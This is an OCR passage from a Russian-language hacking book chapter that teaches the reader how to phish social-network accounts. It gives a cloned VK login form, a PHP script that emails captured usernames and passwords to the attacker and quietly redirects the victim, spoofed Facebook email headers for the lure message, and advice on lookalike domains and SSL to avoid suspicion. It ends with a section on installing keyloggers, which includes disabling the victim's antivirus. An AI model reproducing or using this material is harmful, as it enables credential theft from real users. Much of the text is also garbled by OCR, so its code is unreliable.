Добавил:

Anonymhacker Опубликованный материал нарушает ваши авторские права? Сообщите нам.

Вуз:

Пензенский Государственный Университет

Предмет:

[НЕСОРТИРОВАННОЕ]

Файл:

книги хакеры / Что такое хакинг

.pdf

Скачиваний:

Добавлен:

19.04.2024

Размер:

30.29 Mб

Скачать

☆

<<< < Предыдущая 8 9 10 11 12 13 14 15 16 17 18 19 20 2122 / 3222 23 24 25 26 27 28 29 30 31 32 > Следующая >>>

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

.....................

................ ...................

.. ......

...............

1::Ш

........

·······••1...........--.

..............

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ii#PiiiiiiiiiiiP l:11-iiilii.Piii М

Рис. 8.4. Абракадабра

Тебе понадобится текстовый редактор Notepad2 (бесплатно можно скачать по адресу https://www.flos-freeware.ch/). Открой index.html в этом редакто

ре и выбери команду File, Encoding, UTF-8. Затем измени кодировку win

dows-1251 на utf-8, нужная правка выделена на рис. 8.5.

·v----,c..i,.,.._.,_l

-•'•М:•

J ::.:... ..- -·""'

,___.__,,.., ------------ i

.:.:: ::::;

.:•2:::: . ::::: ,-

·-· • -• .....

,,.

..---- --

-·--·-•-• - ·-··--···.. ..

•t..•_..

,..,. ... --

- ,,..,_,_ ,.,,_.,,...ц-.,,,,,1.,.........-...

··· "1,. -,..

,. ..,,,,.. __ ,....:.... .....

,..__,. ,_

, 'т -··.

•

·-...

,.1,..ьа·.--..,. ...,,. ____ ,___...

, .

..,______ -----•-•--- -•-

-... н1 -•, -••• ,,,,i.-.

,.._ ,. ,..., --t1t'<I

::-·•·_...

to,,._._.,.,_.,. -----. __....

, •"\-IЬ -- t,iн• •' ••1)1-- ,• .,..-- ,1- n1.,,,1w

,._. ,-- -,,11 "j.

,,,_ ,,_.

,.,.,• ..,1.-..,..,...,.,.,.,... . ''-" 111-t•.-.-. ,o,1 u:*1·_...

,,,.•,· ,...., ,,.,.,_

..,

-- •;,,/;"; "':.:" -,. 1-.т"n.rt ,11,...... •••t-1!.н,--,.,11,•• ,,,_.......

• . ,::.:..:. ; t:1,. .ЛtA. ;,.:--:;;:_ .'•; : ;,.;_v;o..; ;... !" ·1"•'..,__...\. ..,_ - --· ,_ t,,..,._'" __.._..,.,,... ,.. ......,... ,.

-r-,

-------,,·.. _

an --

•O,

........,._....

,,.... ,,,.,. ""--1.---•·. -).

=-.:::.::.---.:- - -..

... -(4-.. t ____ ........

')•··--·

----.1·-а ...•••1....,....,

:: : ;:,._,.,., ,

= ,,-

..,_vt) (

• -1,

,1(1 (

,,,-, ◄.... ..

..... n

( . , i..t • ,,

. ,,. • +

• • • ....

О)

•

lr(1-.'"4,,)I

{.......

, .,._,., VI0)1

::,,.,, 1

Рис. 8.5. Редактируем index.html

Сохрани файл и опять залей его по FTP на свой сайт. Открой страничку за ново. Теперь с кодировкой все хорошо (рис. 8.5). Если ты очень вниматель ный, то наверняка заметил, что не хватает изображения смартфона. Но об этом знаешь только ты, и не все пользователи знают, как должна выглядеть страничка входа. При желании ты можешь сделать скриншот страницы и на место объекта-смартфона вставить полученный скришот. Для этого тебе по надобятся знания HTML и работы в графическом редакторе Paint. В общем, основы основ. Мы этого делать не будем, так как считаем, что страница сrо-

'Jится и так.

··················································································f!II

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

· "- _,,,_ ,...--	-
· "- _,,,_ ,...--
вконтактедяямобмьиыхустромсn
--- ......_.-. .dwllit•et'-

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

М·/1:Ф#·М

Рис. 8.6. Проблемы с кодировкой нет

Опять вернись в текстовый редактор. Сейчас у нас будет более важная за дача. Нужно найти форму входа и изменить ее так, чтобы она передавала данные не ВКонтакте, а твоему сценарию, который буд их принимать и отправлять тебе на e-mail.

Наша форма входа выделена на·рис. 8.7. Ее точныйлистинг приведен в лист. 8.2.
•-r.....-
.J•CI" "',. • -.&•4-·..а .....			81.t"
- :-
'::i '·
:»;v"1, 1........, •ti ,:,,n,> _..,...,.. ,1.0,,,"'t.1."""'"- -• _,_,..,,.,.,.,..,_.,..,_.._,!...Ы.1• .. tr.,.:• -•-•-._....,.,,--.}с. ,,_,• ,,.f.,,.
:;	., : ·""		,J, ar f\ .1 ,,11,, ., ,...,_,..,,,.- ,,:,,,-·,t1w\ ; -- t,,i;,. ••;"•
...	'""'..,..,.,.-.,.,.......... ..,....., .,,.-,,1•...............
,,	..... 1.-,.__,_..	-.
	., •· ,	1 ,n· 1	• · 11•,

...	..,.t•• ,ь,....-,..4 •• ,., ....		,.... ._,.__.i...,• ,,...._,,,,...,.._,_1,_• ••i"iц'•·,.\• -- -11n..•,,.._._t,t.oM,)t,W .....,...				!._i .,,,,_.1,,, r.-. - ., ....11•
	•-•• rцis •..,<"W. т- '1н ,w, 11ort,...__.,...-			14,,•-4		••·мlttll J..,,_
-	'"-...;-'\l,.,\\W);>		.,	.,,,,.,.. -.1,u ••-•1,,,•(ti.Ъ.J;""U,1";.,1<.1, _,,.. i-tu.,;1 ,.,... ,.io..:>""4rld,Jn:u",a.-.11,," ,..1. - •
-	..i... ,, ,. •11	.. .. ,. ,.....,,-..."1 \1м.• - •"""• ,,.· ,u, ._
.-, - l..d,,м.."fal,•" ,...,,,,.,...•с• __,.,,,_ 1 ·					1.:1r. - ,.., ••td< fo,,c,• _, .,,.,_,,_,11,4,,--,,.w,-.,• цrе,,,. • • •......		_1..,,,, "'""'
	,,<lf,,,
	,,!41....
;	••1.. , ...,,..__,,..(,мt>•11.r"ffJ,•..- ..,М(lf•:••
.w.o	......1.. •-a;i •·· , ,..
	. ,.. ,;1...	_ ..,,•• ..,,.. •d,,•-,·....1••	1.1'		RJ	'
1.oUfJ1•C,, Wll90			1.1'		RJ	'
			Рис. 8.		7.	Форма входа ВКонтакте

Листинг 8.2. Форма входа ВКонтакте

-··················································································

hang

NOW!

BUY

w Click

<input type

"hidden" name

"act" value

"login">

w Click

f-xchan

<input type "hidden" name

"role" value "al frame">

f-x chan

<div class="label">Teлeфoн или email</div>

<div class="label">Пapoль</div>

Код, на который нужно обратить внимание, выделен жирным:

•https:/Лogin.vk.com/?act=login - сценарий входа, обрабатывающий вве-

денные логин и пароль. Именно ему данные передает наша форма.

•email - это логин (email) пользователя

•pass - а это пароль пользователя.

Итак, нам нужно изменить только сценарий входа на login.php:

	<form method="POST" name="login" id="quick_login_form"
action="login.php" target="quick_login_frame">
•	IJII
.------------------------------------------------

hang

NOW!

BUY

'\.11,11111 11,1 lliJll'll'P·I\

BUY

Теперь все данные форма будет отправлять сценарию login.php. Его

нужно

w Click

поместить

тот же каталог, что и наш index.html. Код этого сценария при

-xcha

-x cha

веден в листинге 8.3.

Листинг 8.3. Код сценария login.php

<?php

//Получаем данные из формы $email $_POST['email']; $login = $ POST['login'];

//разумеется, hacker@example.org меняем на свой адрес электронной почты

mail( 'hacker@example.org', 'Passwords соте', "Login $email Pass $pass");

// Перенаправляем пользователя на главную страничку ВКонтакте

header('Location: https://vk.com'); ?>

Мы понимаем, что язык программирования РНР ты, скорее всего, не знаешь. Попытаемся разжевать максимально подробно. Первым делом наш сцена рий получает данные из формы. Поскольку наша форма использует метод POST (см. method=»post» в коде формы), то мы используем массив $_POST. Если тебе встретится странная форма, передающая логин и пароль методом GET, то данные нужно искать в массиве $_GET.

Далее мы с помощью функции mail() отправляем введенные пользователем значения на твою электронку. Мы не стали морочить голову с заголовками письма, поэтому письмо может попасть в папку Спам. Периодически про веряй ее в поисках пароля. А можешь сам попробовать ввести логин и па роль для проверки формы, найти письмо в папке Спам и пометить его как не спам. В этом случае письма больше не будут попадать в Спам.

Далее, чтобы пользователь ничего не заподозрил, мы перенаправляем его на главную страницу входа в ВК. Собственно, на этом все. Ты получаешь логин и пароль, а пользователь ничего не подозревает, продолжает пользоваться ВК дальше. Метод подходит для случаев, когда не нужно сбрасывать пароль жертвы.

--Фишинг - неплохой метод и с технической точки зрения совсем не сложный. Но дьявол кроется в деталях. От того, насколько качественно ты все реали зуешь, будет зависеть успех этого мероприятия. Например, в нашем случае:

- - - - - - -- - - - - -- -- - - - -- - - - - - - - -- - - - --- - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -- --- _,

hang

NOW!

1 1.11:,1 S 1\: 10\111 :,1111111,1 ,1 1,1,:1\11101: 1\ lOllll,1.11,111,1\ l'l'l!l\

BUY

w Click

• Дляm

экономии времени мы не стали публиковать картинку со смартфономw Click

на странице входа. Это косяк. Не то, чтобы явный, но некоторые пользо

-xcha

-x cha

ватели могут заметить.

• Также мы не использовали сайт с SSL. Обрати внимание - возле значка VPN есть значок восклицательного знака. Он говорит о том, что HTTPS не используется. Это тоже прокол. Нужно купить самый дешевый серти фикат или прикрутить бесплатный сертификат Let's Encrypt. Конечные инструкции ты узнаешь у хостера, у которого купил хостинг под все это дело.

• Многое зависит от доменного имени, которое ты купишь. Насколько оно будет похоже на имя той сети, страничку в которой ты хочешь взломать. Конечно, глупых пользователей много и некоторые могут попросту не обратить внимание на адрес, но тебе же не хочется, чтобы пользователь заметил фейк?

• Огромное внимание нужно уделить письму, которое предназначено, что бы заманить пользователя на фейковую страничку. Подделать его нужно . полностью, до мельчайших подробностей, включая заголовки письма. О том, как подделать заголовки письма было сказано в главе 3. Например, для Facebook заголовки выглядят так:

$headers = 'From: Facebook <notification@facebookmail.com>'

. "\r\n" .

'Reply-to: noreply <noreply@facebookmail.com>' . "\r\n";

mail($to, $subject, $message, $headers);

Примечание. Почему очень важно подцелать заголовки? Да потому что некоторые пользователи сортируют сообщения от социальных сетей. Они попадают в определенную папку в ин терфейсе почтовой программы. Если письмо попадет в другую папку, то ты прокололся уже в самом начале, так ничего и не начав. С вероятностью 90% можно сказать, что пользователь не перейдет по ссылке в твоем письме

Код письма, которое отправляет социальная сеть, можно получить при про смотре оригинала сообщения в почтовой программы. Зарегистрируйся в той

социальной сети, страничку. в которой ты хочешь взломать. Открой письмо от социальной сети. Возможно, нужно будет подождать, пока сеть пришлет---

•тебе то письмо, которое подходит для твоей цели. Например, когда кто то

. - -- - -- - - - --- - - - - - - - --- -- - - - - - - - - - - - .- - - - - - -. . - - - - - - --- --- - - - - - - - - ... - - - . - - - - . - - .

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

,	V1 ' дн (	'	tJJ,	х
	с о		• fllclll (JOO(JI,,' ОIП
		--Ь1 cQ11d059d33d9feб19c747bЫff064f7 .
		contё"rrt-1'ype: text./ht111l; charset-..U1F-8-
		Cont.ent-lrans,fer- Encodirig: quoted-pr1nt•Ьle
		<!ООСТУРЕ HJl'\l PUBLIC -//W"3,C//01D Hv,L 4.81 Jrans1t1ona] //EN"нht•l><M
		><title,fac.eЬook</tlt.le><:.eta http-@qu1v"JO"'Content-Тур@" content•ЗD"text/h•
		t•1; char!>et-ЗDutf-8.. /Hst:yl@ nonce-31)"xYbXJdyu">jlltedia al.l .tnd (Nx-width•
		: 480px.){"[class.J .lb_t.{ain-w:ldth:100% !i11pOrt.ant}t[class] .1b_row{d1splay:Ы•
		ock !laportant}•-{cla!.Sj.ib_ext{display:Ьlock l18!p0rtant;paddlng:1epx е Spx •
		8;vertical-al1gri:top ! isportant;width:100S !.iiaportмt}'" [cla!>s}. ib_irt&, "'(cla•
		ssj. ib_■id{vert.lcal-align:top !111pO!'"tarrtJ•[cl•ss].•ь_Ыk{dlsplay:Ыосk !iмр,,,
		or-tillnt;padd1ng-Ьott08:18px;width:188X 11мportant}•[class)..Ь h1de{dlsplay :n
		one ! illlipOrtarit}-.{class] ..Ь_tnl{d1splay:1nliм l1•portant}*(class] .d_.Ь_nex"
		{displilly: Ыосk		litlportaot}}.d_.Ь_shw{display:none}.d_•b_flex{d1sp1ay:flex}•
		fjrlled1a only screeo and (•ax-devic:@-widtb: 489pxH.d_llЬ_h1d@{dJsplay:nonf! 11•
		-.:iortant} .d_№_stюw{display:Ыock !i•port t}.d_.Ь_flex{dJsplay:block I iepo
		rtillnt}}..Ь text h1,..Ь text h2, •.Ь 'text h3,..Ь text h4, .•Ь text hS, •.Ь text•
		h6{l1ne1gh't.:no l}..Ь_work:_te;t hl{font-siL2:18рх;1!,,;-height: n l;..,.
		aratn-top:4рх} .IIЬ_work_text h2•..Ь_'Work_tert hЗ{font-slze;1брх_; 1ine-height: ..
		nor-.al;faillrt11n-top:4px}.aь_worfc_text h4, •.Ь_work_tex-t h5•..ь_ k:_text nб{fo,.
		nt-size:14рх;line -height:nonul} ..Ь_мork_text а{color:f1278е9} ..Ь_work_tl!xt•
			p{•ar1in-t:op:4px)</styleн/head><t.1Ыe Ьorder-ю·e"' width-30'" 1eei· cellsp.a-,,
		cing"эo"e'" cellpadding•ЗO"e" style-JO"Ьorder-coll;ipse:collaps@;•нtr-нut wi•
		dt.h•10'"1 align-30"c@nter-w st.yl@•ЗDW"нt.aЫe Ьоrdе,-...эо"е" cellspacing•З0-
		"0" c@llp.юding,-3D"e" alifr:n•ЭO"cente-r" style•ЗO"Ьord r--coJ1apst!:co11apse;•>•
		<tr><td width•3D"848· align-3D"center" style-3D"""><Ьody styl@-Jb"nx•w1dth:•
		-428рх;маr-вin:в auto;" dir--ЗO"lt•r-" bgcolor•ЗD"lfffffff"><t•ble Ьом::lеr-зо·е" <•
		ellspacing•ЭD-e" c@1lplildd1ng-З0"e" al1gn-зo-c@nt:er" ld-.IO"н•il_table'" styl
		e-эo oorder-collapse:collapse;a a xwidth:-			428рх;11a1•gtn:е .1uto;•><tr><td id•ЗO,.
		·e11;1il_content" style-3D"font-fмJ1y:Нelvetica Neue,нelvet:10, Lu<:ida Gr;,1nd••
		t"я vв""'4.an;o		:.r-t::io1 "'"'nc:.c:.,.,-ff•h0trlrorv"1,,iv!••ff.ff.ff·"-...Lt" t,1,. мм...-. n"А- -

Рис. 8.8. Просмотр оригинала письма

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Листинг 8.4. Скрипт отправки письма в формате HTML

<?php

$messaqe = file_get contents ( 'message. html') mail (

'hacker@example.orq',

'Тема', $messaqe,

"From: Facebook <notification@facebookmail.com>\r\n"

."Content-type: text/html; charset=utf-8\r\n"

IJII----------- - -- - ---------- ------------------------------- - --- - ----------------

. -- _,

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i	r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to							m
w Click											m
w
	w									o
	.							.c
		p					g
			df			n		e
				-xcha ) ;

hang

NOW!

1 1.1: .. 1 '\

Н: 111\) 11 :.11!1111,1,ll,1"1\IIIIJI: 1, lltllll,1.11,111,1\

l'('III\

BUY

."X-Мailer: ZuckМail

[version 1.00)"

w Click

-x cha

То: Адрес получателя

Subject: Тема X-Priority: 3

X-Mailer: ZuckМail [version 1.00]

From: Facebook <notification@facebookmail.com> Reply-to: noreply <noreply@facebookmail.com> Errors-To: notification@facebookmail.com

X-Facebook-Notify: birthday_reminder; mailid= 7b5af9acc94d6G5af 38faalb5aG5b5afe4629ba8Gla

List-Unsubscribe: <https://www.facebook.com/o.php?k=AS0s8tXaU

•tE6KlUGr4c&u=100002139085658&mid=5d5af7acc98d6G5af38ffalb5aG5

··-···············································································-1111

hang

NOW!

BUY

,al,11111 11,1 IIIJll'll'(l:I\

BUY

w Click

b5efe3629ba8Gla&eem

AYЗMKGdB2m3JaaJQfq45UgeK7UfE7Vag5d07dkOiQnClick

df-xchann ULrQljmN0UlL_nG9uSlkRXSo3_eqpЫeQ>

df-x chan

Feedback-ID: 0:Ьirthday_reminder:Facebook

X-FACEBOOK-PRIORITY: О

X-Auto-Response-Suppress: All

MIME-Version: 1.0

это

но

их заголовках письма. А можно использовать библиотеку РНР

генери

рования UUID и автоматизировать этот процесс. Тогда каждое новое письмо,

которое ты отправляешь, будет со своим UUID.

этого используется та

кой сценарий (лист. 8.5).

Листинг 8.5. Сценарий генерирования UUID

<?php

require 'vendor/autoload.php';

use Ramsey\Uuid\Uuid;

use Ramsey\Uuid\Exception\UnsatisfiedDependencyException; try

// Версия 1 (основана на времени) $uuidl = Uuid::uuidl();

echo· $uuidl->toString() . "\n"; // i.e. e4eaaaf2-d142- llel-b3e4-080027620cdd

// Версия 3. (на базе названия и MDS)

$uuid3 = Uuid::uuidЗ(Uuid::NAМESPACE_DNS, 'php.net'); echo $uuid3->toString() . "\n"; // i.e. lla38b9a-Ь3da-

360f-9353-a5a725514269

// Версия 4 (случайный набор символов) $uuid4 = Uuid::uuid4();

echo $uuid4->toString() . "\n"; // i.e. 25769cбc-d34d- 4bfe-ba98-e0ee856f3e7a

-- - - - - - - - - -- - - - - -- - - --- - - - - - - --- --- - - - - - - - -- - - - - - - - - - - - - - - - - - - -- -- - ---- - ----------.

// Версия 5 (на базе названия и SHAl)

$uuid5 = Uuid::uuidS(Uuid::NAМESPACE_DNS, 'php.net'); •

hang

NOW!

BUY

) 1.11"1 : 1\: 111'111 "1111111,1

.11,1"11111(11, 1: ,111111,111,11!,1\ l'l 1\1\

BUY

w Click

echo

$uuid5->toString() . "\n";

// i.е. c4a760a8-dbcf-p

-xcha

-x cha

5254-a0d9-бa4474bdlb62

catch (UnsatisfiedDependencyException $е)

//В случае ошибки

//использования 32-битной системы. Или отсутствия

библиотеки Moontoast\Math.

echo 'Caught exception: ' . $e->getMessage() . «\n»;

Загрузить саму библиотеку, которая занимается непосредственно генериро ванием UUID, можно по адресу https://github.com/ramsey/uuid.

Для более удобного формирования заголовков и отправки сообщений в формате HTML можно использовать библиотеку PНPMailer: https://github. com/PHPMailer/PHPMailer. Данная библиотека позволяет не только просто отправлять сообщения в формате HTML, но и сообщения со вложениями. Возможно, при взломе социальных аккаунтов тебе эта возможность и не по надобится. Но она нужна много где еще. В лист. 8.6 приводится пример

отправки сообщения со вложением.

Листинг 8.6. Отправка сообщения с вложением

<?php

// Подключаем PHPMailer

use PHPMailer\PHPMailer\PHPMailer; require ' .. /vendor/autoload.php';

//Создаем новый экземпляр объекта $mail = new PHPMailer();

//Устанавливаем заголовок From

$mail->setFrom('from@example.com', 'First Last'); // Устанавливаем заголовок Reply-to

$mai1->addReplyTo('rep1yto@example.com', 'First Last'); // Добавляем адрес $mail->addAddress('whoto@example.com', 'John Doe');

//Устанавливаем тему письма $mail->Subject = 'test';

//Добавляем НТМL-код письма

$mail->msgHTML(file_get_contents('contents.html'), DIR );

// Добавляем обычную текстовую версию письма (необязательно...)

•$mail->AltBody = 'This is а plain-text message body'; //Добавляем вложение - картинку

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

				hang			e
			C				e	E
		X						E
	-								d
	F									t
	D									i
	D									r
P						NOW!				o
P
					BUY
				to	BUY
w Click				to		$mailm					->addAttachment('images/phpmailer_mini.png');
w Click						$mailm					->addAttachment('images/phpmailer_mini.png');
w
	w									o
	.								.c
		p						g
			df				n		e
				-xcha

// Отправляем сообщение и проверяем на наличие ошибок if ( !'$mail->send()) {

echo 'Ошибка: ' . $mail->Errorinfo; else {

echo 'Письмо отправлено!';

8.3.5. Клавиатурный шпион

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Данный метод, наверное, самый простой со всех. Он заключается в установ ке клавиатурного шпиона на компьютер жертвы. Клавиатурный шпион - это программа, которая записывает все, что вводит пользователь с клавиатуры в специальный файл или отправляет хакеру на электронку, например, когда файл достигает определенного размера или по прошествии определенного времени, скажем, раз в день.

У этого способа куча недостатков:

•	Тебе нужен физический доступ к компьютеру жертвы, чтобы установить
	программу-шпион. Можно отправить его в письме - в виде ссылки или
	как вложение, но в 99% случаев антивирус (или почтовой системы или
	установленный на компе жертвы) начнет бить тревогу. Все имеющиеся
	клавиатурные шпионы распознаются антивирусами как вирусы или шпи
	онское ПО (spyware). Так что тебе на время установки придется выклю
	чить антивирус, а после установки шпиона - добавить его в исключение
	антивируса. На все про все уйдет минут 5, если ты все сделаешь быстро.
	Но эти 5 минут жертва должна отсутствовать за компом. Подойдет только
	если есть личный доступ, например, это домашний комп или комп кол
	леги.
•	Клавиатурные шпионы, кроме паролей, записывают в файл все, что вво
	дит жертва. Порой это очень много текста и ты можешь потратить день
	или даже больше, чтобы разобрать, что вводила жертва.
•	Жертва может не вводить пароль вовсе. Он может быть сохранен в бра
	узере. Поэтому ты можешь получить все, что вводила жертва, но кроме

паролей! Заодно, конечно, прочитаешь текст всех отправленных жертвой

...сообщений, но цель не будет достигнута.

В общем, клавиатурный шпион - не лучшее решение для взлома странички в социальной сети, но как один из вариантов, его можно использовать.

. . .... - .. - ----- - - - - -- - - - - - - - -- - - - - --- - - -- - - - --- - - - - - - - --- - - - - - - - - - - - - - - - - - --- - - _,

<<< < Предыдущая 8 9 10 11 12 13 14 15 16 17 18 19 20 2122 / 3222 23 24 25 26 27 28 29 30 31 32 > Следующая >>>

Соседние файлы в папке книги хакеры

#
19.04.202438.41 Mб17Сид Стюард Взломы pdf.pdf
#
19.04.202430.29 Mб19Хакинг на примерах.pdf
#
19.04.20243.16 Mб18Хакинг__искусство_эксплоита.pdf
#
19.04.2024939.81 Кб14Халявный_интернет_и_заразные_соседи_Как_работают_уязвимости_в_сети.pdf
#
19.04.20249.09 Mб19Что такое киберпреступность.pdf
#
19.04.202430.29 Mб20Что такое хакинг.pdf
#
19.04.202420.34 Mб18Эдриан_Прутяну_Как_стать_хакером_сборник_практическиз_сценариев.pdf